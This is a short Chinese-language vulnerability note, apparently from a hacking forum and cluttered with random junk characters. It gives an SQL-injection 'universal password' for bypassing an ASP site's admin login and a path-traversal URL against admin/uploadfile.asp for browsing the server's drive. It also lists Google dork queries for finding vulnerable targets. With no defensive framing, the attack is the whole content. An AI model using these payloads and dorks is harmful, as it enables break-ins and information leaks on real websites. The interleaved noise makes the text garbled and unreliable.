后台万能密码 'or'='or' H* G. A- z& s
2 X' {+ v3 i2 [0 D* w; J
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!- V+ c2 V2 \( y* x
admin/uploadfile.asp?currentFolder=/upfiles/../
' ~# {, V2 d' L+ |2 u
. _ f/ L- I1 U8 J* c7 S漏洞证明:
) G/ j6 y6 q2 Y |) v
* \2 I7 i4 z; y, D2 u1 e谷歌:inurl:type.asp?id=1 新闻中心/ y7 K7 {; l# [4 k. F" ?$ L6 v
或者 :inurl:download_ok.asp?3 g5 @( G; B8 r$ e( `; {
+ k3 s$ h0 }( m6 @- v6 O" i |